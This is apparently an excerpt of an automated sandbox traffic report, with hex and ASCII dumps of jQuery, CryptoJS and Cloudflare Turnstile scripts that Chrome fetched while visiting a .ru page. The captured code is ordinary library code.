                                                                        Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                        2025-01-16 08:20:18 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                        Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                        2025-01-16 08:20:18 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                        Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                        2025-01-16 08:20:18 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                        Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549721104.17.25.144433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:17 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                        Host: cdnjs.cloudflare.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: script
                                                                        Referer: https://56.hanagibenewe.ru/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:17 UTC954INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:17 GMT
                                                                        Content-Type: application/javascript; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Access-Control-Allow-Origin: *
                                                                        Cache-Control: public, max-age=30672000
                                                                        ETag: W/"61182885-40eb"
                                                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                        cf-cdnjs-via: cfworker/kv
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        Timing-Allow-Origin: *
                                                                        X-Content-Type-Options: nosniff
                                                                        CF-Cache-Status: HIT
                                                                        Age: 673428
                                                                        Expires: Tue, 06 Jan 2026 08:20:17 GMT
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FiiaMkPDd8DUAJfM0njHrW8r0cnYPnx9UEmLUZw2bUnmVi9Exy43o8f8FUNEgZ2qhrIn9PMRKhp7lH1xCkj%2Bc5VFquEz6yQhpgyInrnRY302t25t2vKIMWhNm2yzd94DZvgfrhjp"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                        Strict-Transport-Security: max-age=15780000
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf7becbf0f53-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:17 UTC415INData Raw: 33 39 37 39 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                        Data Ascii: 3979!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c
                                                                        Data Ascii: balThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b
                                                                        Data Ascii: this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f
                                                                        Data Ascii: t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30
                                                                        Data Ascii: =this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31
                                                                        Data Ascii: =0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>1
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69
                                                                        Data Ascii: yteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:functi
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55
                                                                        Data Ascii: (64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTU
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61
                                                                        Data Ascii: (t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._ha
                                                                        2025-01-16 08:20:17 UTC1369INData Raw: 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29
                                                                        Data Ascii: (m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50])


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549722104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:18 UTC649OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: cross-site
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: script
                                                                        Referer: https://56.hanagibenewe.ru/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:18 UTC471INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:18 GMT
                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                        Content-Length: 47521
                                                                        Connection: close
                                                                        accept-ranges: bytes
                                                                        last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                        access-control-allow-origin: *
                                                                        cross-origin-resource-policy: cross-origin
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf7f8a2743da-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:18 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                        2025-01-16 08:20:18 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                        Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
